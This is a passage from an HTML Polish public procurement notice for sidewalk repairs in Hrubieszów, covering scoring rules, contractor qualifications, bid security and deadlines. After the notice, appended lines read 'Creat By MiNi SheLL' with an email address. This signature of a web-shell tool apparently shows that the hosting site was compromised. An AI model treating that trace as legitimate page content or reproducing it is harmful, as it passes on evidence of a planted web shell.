zamówienia, niepowodujące istotnych<br/>zmian w treści oferty;<br/>- niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.<br/>POUCZENIE:<br/>Wykonawca, w którego ofercie poprawiono omyłkę, o której mowa w art. 223 ust. 2 pkt 3 PZP, ma<br/>prawo w terminie wyznaczonym przez Zamawiającego liczonym od dnia otrzymania zawiadomienia o<br/>poprawieniu omyłki, do wyrażenia zgody na poprawienie w ofercie omyłki lub zakwestionowanie jej<br/>poprawienia.<br/>Brak odpowiedzi w wyznaczonym terminie uznaje się za wyrażenie zgody na poprawienie omyłki.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>1) spełnia wszystkie wymagania zawarte w ustawie Prawo zamówień publicznych;<br/>2) spełnia wszystkie wymagania określone w SWZ;<br/>3) została uznana za najkorzystniejszą w oparciu o określone w SWZ kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont chodnika przy ul. Mickiewicza w Hrubieszowie przy drodze powiatowej nr 3473 o długości 124 mb; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111300-1 - Roboty rozbiórkowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona z uwzględnieniem kryteriów opisanych w<br/>niniejszym rozdziale:<br/>Opis kryterium Ranga<br/>Cena [C] 60%<br/>Oferowany okres gwarancji [G] 40 %<br/>2. Obliczenie liczby punktów za kryterium cena [C], nastąpi według wzoru:<br/>cena najtańszej oferty<br/>C = x 60 pkt<br/>cena oferty badanej<br/>3. Obliczenie liczby punktów za kryterium oferowany okres gwarancji i rękojmi [G] nastąpi według<br/>wzoru:<br/>okres gwarancji w ofercie ocenianej<br/>G = x 40 pkt<br/>najdłuższy oferowany okres gwarancji w ofertach<br/>(nie więcej niż 60 miesięcy)<br/>przy czym:<br/>1) minimalny wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy; oferty w których<br/>zaoferowany krótszy okres gwarancji, zostaną odrzucone jako niezgodne z SWZ;<br/>2) jeżeli Wykonawca nie wskaże w ofercie terminu gwarancji, Zamawiający przyjmie, że Wykonawca<br/>oferuje minimalny wymagany okres gwarancji, tj. 36 miesięcy;<br/>3) Wykonawca może zaoferować tylko jeden okres gwarancji określony w miesiącach np. 50 miesięcy.<br/>Jeżeli Wykonawca nie wskaże konkretnej ilości miesięcy tylko kilka miesięcy lub zakres, Zamawiający<br/>przyjmie, że Wykonawca zaoferował najkrótszy podany okres gwarancji;<br/>4) jeżeli Wykonawca wskaże niepełne miesiące, Zamawiający przyjmie, że Wykonawca zaoferował<br/>okres krótszy poprzez zaokrąglenie jego w dół;<br/>5) maksymalny punktowany przez Zamawiającego okres gwarancji to 60 miesięcy. Zaoferowanie<br/>okresu dłuższego spowoduje przyjęcie przez Zamawiającego do oceny i porównania ofert okresu 60 –<br/>miesięcznego, przy czym w umowie zostanie wskazany okres gwarancji wskazany przez Wykonawcę<br/>w ofercie.<br/>4. Łączna liczba punktów przyznana ofercie stanowi sumę punktów za kryteria wskazane w ust. 1.<br/>Zamawiający dokona oceny ofert, obliczając wartość punktów z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z następującymi zasadami:<br/>4) końcówki poniżej 0,0005 pkt pomija się,<br/>Ogłoszenie nr 2021/BZP 00098036/01 z dnia 2021-06-29<br/>2021-06-29 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>5) końcówki wynoszące 0,005 pkt i więcej zaokrągla się do 0,01 pkt.<br/>5. Na podstawie art. 223 ust. 2 w zw. z art. 266 PZP, Zamawiający poprawia w tekście oferty:<br/>1) oczywiste omyłki pisarskie;<br/>2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych<br/>poprawek, w szczególności:<br/>1) w przypadku niezgodności pomiędzy ceną oferty w formularzu ofertowym wpisaną liczbą lub<br/>słownie, odczytaną podczas otwarcia ofert, a ceną oferty wynikającą ze Zbiorczego zestawienia<br/>kosztów, za cenę oferty przyjmuje się cenę wynikającą ze Zbiorczego zestawienia kosztów;<br/>2) jeżeli obliczona w Zbiorczym zestawieniu kosztów wartość brutto (cena oferty) nie odpowiada sumie<br/>kosztów netto poszczególnych pozycji oraz podanej wartości podatku VAT, przyjmuje się, że<br/>prawidłowo podano koszt netto każdej pozycji oraz wartość podatku VAT.<br/>3) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych<br/>zmian w treści oferty;<br/>- niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.<br/>POUCZENIE:<br/>Wykonawca, w którego ofercie poprawiono omyłkę, o której mowa w art. 223 ust. 2 pkt 3 PZP, ma<br/>prawo w terminie wyznaczonym przez Zamawiającego liczonym od dnia otrzymania zawiadomienia o<br/>poprawieniu omyłki, do wyrażenia zgody na poprawienie w ofercie omyłki lub zakwestionowanie jej<br/>poprawienia.<br/>Brak odpowiedzi w wyznaczonym terminie uznaje się za wyrażenie zgody na poprawienie omyłki.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>1) spełnia wszystkie wymagania zawarte w ustawie Prawo zamówień publicznych;<br/>2) spełnia wszystkie wymagania określone w SWZ;<br/>3) została uznana za najkorzystniejszą w oparciu o określone w SWZ kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont chodnika przy ul. Królowej Jadwigi w Hrubieszowie przy drodze powiatowej nr 3467 L o długości 267,2 mb. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111300-1 - Roboty rozbiórkowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona z uwzględnieniem kryteriów opisanych w<br/>niniejszym rozdziale:<br/>Opis kryterium Ranga<br/>Cena [C] 60%<br/>Oferowany okres gwarancji [G] 40 %<br/>2. Obliczenie liczby punktów za kryterium cena [C], nastąpi według wzoru:<br/>cena najtańszej oferty<br/>C = x 60 pkt<br/>cena oferty badanej<br/>3. Obliczenie liczby punktów za kryterium oferowany okres gwarancji i rękojmi [G] nastąpi według<br/>wzoru:<br/>okres gwarancji w ofercie ocenianej<br/>G = x 40 pkt<br/>najdłuższy oferowany okres gwarancji w ofertach<br/>(nie więcej niż 60 miesięcy)<br/>przy czym:<br/>1) minimalny wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy; oferty w których<br/>zaoferowany krótszy okres gwarancji, zostaną odrzucone jako niezgodne z SWZ;<br/>2) jeżeli Wykonawca nie wskaże w ofercie terminu gwarancji, Zamawiający przyjmie, że Wykonawca<br/>oferuje minimalny wymagany okres gwarancji, tj. 36 miesięcy;<br/>3) Wykonawca może zaoferować tylko jeden okres gwarancji określony w miesiącach np. 50 miesięcy.<br/>Jeżeli Wykonawca nie wskaże konkretnej ilości miesięcy tylko kilka miesięcy lub zakres, Zamawiający<br/>przyjmie, że Wykonawca zaoferował najkrótszy podany okres gwarancji;<br/>4) jeżeli Wykonawca wskaże niepełne miesiące, Zamawiający przyjmie, że Wykonawca zaoferował<br/>okres krótszy poprzez zaokrąglenie jego w dół;<br/>5) maksymalny punktowany przez Zamawiającego okres gwarancji to 60 miesięcy. Zaoferowanie<br/>okresu dłuższego spowoduje przyjęcie przez Zamawiającego do oceny i porównania ofert okresu 60 –<br/>miesięcznego, przy czym w umowie zostanie wskazany okres gwarancji wskazany przez Wykonawcę<br/>w ofercie.<br/>4. Łączna liczba punktów przyznana ofercie stanowi sumę punktów za kryteria wskazane w ust. 1.<br/>Zamawiający dokona oceny ofert, obliczając wartość punktów z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z następującymi zasadami:<br/>4) końcówki poniżej 0,0005 pkt pomija się,<br/>Ogłoszenie nr 2021/BZP 00098036/01 z dnia 2021-06-29<br/>2021-06-29 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>5) końcówki wynoszące 0,005 pkt i więcej zaokrągla się do 0,01 pkt.<br/>5. Na podstawie art. 223 ust. 2 w zw. z art. 266 PZP, Zamawiający poprawia w tekście oferty:<br/>1) oczywiste omyłki pisarskie;<br/>2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych<br/>poprawek, w szczególności:<br/>1) w przypadku niezgodności pomiędzy ceną oferty w formularzu ofertowym wpisaną liczbą lub<br/>słownie, odczytaną podczas otwarcia ofert, a ceną oferty wynikającą ze Zbiorczego zestawienia<br/>kosztów, za cenę oferty przyjmuje się cenę wynikającą ze Zbiorczego zestawienia kosztów;<br/>2) jeżeli obliczona w Zbiorczym zestawieniu kosztów wartość brutto (cena oferty) nie odpowiada sumie<br/>kosztów netto poszczególnych pozycji oraz podanej wartości podatku VAT, przyjmuje się, że<br/>prawidłowo podano koszt netto każdej pozycji oraz wartość podatku VAT.<br/>3) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych<br/>zmian w treści oferty;<br/>- niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.<br/>POUCZENIE:<br/>Wykonawca, w którego ofercie poprawiono omyłkę, o której mowa w art. 223 ust. 2 pkt 3 PZP, ma<br/>prawo w terminie wyznaczonym przez Zamawiającego liczonym od dnia otrzymania zawiadomienia o<br/>poprawieniu omyłki, do wyrażenia zgody na poprawienie w ofercie omyłki lub zakwestionowanie jej<br/>poprawienia.<br/>Brak odpowiedzi w wyznaczonym terminie uznaje się za wyrażenie zgody na poprawienie omyłki.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>1) spełnia wszystkie wymagania zawarte w ustawie Prawo zamówień publicznych;<br/>2) spełnia wszystkie wymagania określone w SWZ;<br/>3) została uznana za najkorzystniejszą w oparciu o określone w SWZ kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2)	zdolności technicznej lub zawodowej dotyczący doświadczenia wykonawcy:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał minimum jedną robotę budowlaną w ciągu dróg lub ulic klasy min. L polegający na budowie, przebudowie lub remoncie chodnika lub chodników o łącznej długości co najmniej:<br/>- dla części 1 – 30 mb;<br/>- dla części 2 – 100 mb;<br/>- dla części 3 – 70 mb;<br/>- dla części 4 – 150 mb.<br/>oraz załączy dowody określające, czy ta robota budowalna została wykonana należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowalne zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty<br/>Jeżeli Wykonawca składa ofertę na więcej niż jedną część zamówienia, Wykonawca może powołać się na doświadczenie obejmujące wykonanie jednej lub większej liczby robót budowalnych (nie więcej jednakże niż liczba części na które Wykonawca składa ofertę), jeżeli łączna liczba metrów bieżących chodnika lub chodników objętych robotami nie była mniejsza niż suma wymaganych metrów bieżących chodnika lub chodników dla tych części wskazanych w powyższych tiretach. <br/>Za chodnik, Zamawiający uzna chodnik w rozumieniu przepisów ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2020 , poz. 470).<br/>Za drogę lub ulicę Zamawiający uzna drogę lub ulicę w rozumieniu przepisów ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2020 , poz. 470). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wraz z ofertą Wykonawca jest zobowiązany złożyć aktualne oświadczenie, o którym mowa w art.<br/>125 ust. 1 PZP, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, wg<br/>wzoru stanowiącego Załącznik nr 3 do SWZ.<br/>1) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o<br/>którym mowa w art. 125 ust. 1 PZP, składa każdy z tych wykonawców, wg wzoru stanowiącego<br/>Załącznik nr 3 do SWZ. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>2) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia, wraz oświadczeniem, o którym mowa w art. 125 ust. 1 PZP, także oświadczenie<br/>podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje<br/>się na jego zasoby, wg wzoru stanowiącego Załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">: 3. Podmiotowe środki dowodowe dotyczące potwierdzenia spełniania<br/>Ogłoszenie nr 2021/BZP 00098036/01 z dnia 2021-06-29<br/>2021-06-29 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>warunków udziału w postępowaniu, składane na wezwanie Zamawiającego przez wykonawcę, którego<br/>oferta została najwyżej oceniona (w terminie wyznaczonym przez Zamawiającego, nie krótszym niż 5<br/>dni):<br/>1) wykaz robót budowalnych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów<br/>określających, czy te roboty budowalne zostały wykonane należycie, przy czym dowodami, o których<br/>mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowalne zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowalnych wykonywanych<br/>wspólnie z innymi wykonawcami, wykaz o którym stanowi pkt 1 dotyczy robót budowalnych, w których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>2) Dokumenty o których mowa powyżej w Rozdziale VI. cz. A ust. 3 pkt 1, składają łącznie wszyscy<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub z osobna każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> B. DOKUMENTY SKŁADANE WRAZ Z OFERTĄ<br/>1. Na ofertę składają się:<br/>1) uzupełniony formularz ofertowy, zgodnie z załącznikiem nr 2 do SWZ (oryginał);<br/>2) uzupełnione oświadczenie Wykonawcy o którym mowa w art. 125 ust. 1 PZP, zgodnie z<br/>załącznikiem nr 3 do SWZ;<br/>3) uzupełnione zbiorcze zestawienie kosztów, zgodnie z załącznikiem nr 8 do SWZ (oryginał).<br/>2. Poza dokumentami wskazanymi w cz. A jako składane wraz z ofertą, wraz z ofertą<br/>Wykonawca ma obowiązek złożyć:<br/>1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest<br/>zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów;<br/>2) jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie<br/>wynika z dokumentów, o których mowa w punkcie poprzedzającym: pełnomocnictwo lub inny<br/>dokument potwierdzający umocowanie do reprezentowania wykonawcy;<br/>3) w przypadku wnoszenia wadium w formie innej niż pieniężna – oryginał dokumentu<br/>wadialnego (gwarancji lub poręczenia);<br/>4) pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia o ile dotyczy;<br/>5) oświadczenie dotyczące Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>składane na podstawie art. 117 ust. 4 PZP, zgodnie z załącznikiem nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w wysokości:<br/><br/>1)	Dla części 1 300,00 zł (słownie: trzysta złotych i 00/100);<br/><br/>2)	Dla części 2 1.080,00 zł (słownie: jeden tysiąc osiemdziesiąt złotych i 00/100);<br/><br/>3)	Dla części 3 1.540,00 zł (słownie: jeden tysiąc pięćset czterdzieści złotych i 00/100);<br/><br/>4)	Dla części 4 2.050,00 zł (słownie: dwa tysiące pięćdziesiąt złotych i 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>1) w odniesieniu do warunków udziału w postępowaniu wskazanych w ust. 1 pkt 2 wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane lub usługi do realizacji których te zdolności są<br/>wymagane,<br/>2) w przypadku, o którym stanowi pkt 1, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy, według wzoru stanowiącego zał. nr 5 do<br/>SWZ.<br/>3) wykonawcy są zobowiązani ustanowić pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo powinno zostać złożone wraz z ofertą. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z paragrafem 15 i 16 umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://pzdh.ezamawiajacy.pl w zakładce „OFERTY"</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-30 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-29</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com